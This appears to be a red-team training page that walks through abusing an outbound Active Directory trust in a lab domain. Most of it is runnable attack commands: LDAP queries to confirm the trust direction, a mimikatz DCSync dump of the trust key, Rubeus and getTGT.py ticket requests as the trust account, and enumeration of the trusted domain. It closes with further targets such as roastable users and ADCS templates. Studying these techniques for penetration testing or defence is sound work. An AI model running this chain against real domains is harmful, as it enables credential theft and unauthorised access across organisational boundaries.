Operator On The Wire
← Back to Knowledge Base
OOTW / Chapter IV - Active Directory / 04. Techniques / Trusts / Techniques

Outbound

Outbound trust abuse starts when we are on the wrong side of a one-way trust. Our domain trusts the other domain, but that does not automatically let us enumerate or access the other domain. The useful path is the inter-realm trust key stored in the trusted domain object.

Confirm outbound direction

ldapsearch -LLL -x -H ldap://10.10.10.200 -D 'ootw.local\student' -w 'student' -b 'DC=ootw,DC=local' '(objectClass=trustedDomain)' name trustPartner trustDirection trustAttributes flatName objectGUID

Expected direction

trustDirection: 2

Attempting foreign enumeration without usable trusted-domain credentials usually fails.

ldapsearch -LLL -x -H ldap://trusted-dc.trusted.local -D 'ootw.local\student' -w 'student' -b 'DC=trusted,DC=local' '(objectClass=domain)' name

Dump TDO trust key by GUID

mimikatz.exe "lsadump::dcsync /domain:ootw.local /guid:{288d9ee6-2b3c-42aa-bef8-959ab4e484ed}" "exit"

Request TGT as the trust account from Windows

Rubeus.exe asktgt /user:OOTW$ /domain:trusted.local /dc:trusted-dc.trusted.local /rc4:<OUT_RC4> /ptt
klist

Request TGT as the trust account from Linux

getTGT.py trusted.local/'OOTW$' -hashes :<OUT_RC4> -dc-ip <TRUSTED_DC>
export KRB5CCNAME='OOTW$.ccache'
klist

Enumerate the trusted domain with the trust account

ldapsearch -Y GSSAPI -H ldap://trusted-dc.trusted.local -b 'DC=trusted,DC=local' '(objectClass=domain)' name objectSid

ldapsearch -Y GSSAPI -H ldap://trusted-dc.trusted.local -b 'DC=trusted,DC=local' '(servicePrincipalName=*)' sAMAccountName servicePrincipalName

nxc ldap trusted-dc.trusted.local -d trusted.local -u 'OOTW$' -k --use-kcache

Windows enumeration after ticket injection

Get-DomainTrust -Domain trusted.local

Get-DomainUser -Domain trusted.local

Get-DomainComputer -Domain trusted.local

Next targets

Roastable users
ADCS templates and enrollment services
Delegation paths
Foreign security principal memberships
Weak shares and exposed GPO data

Notes

The trust account normally has basic domain-user style visibility in the trusted domain because its primary group is effectively Domain Users. That usually gives enumeration, not immediate administrative access.

The current and previous trust keys may both work if the trust password rotation window overlaps. In Mimikatz output these often appear as [Out] and [Out-1].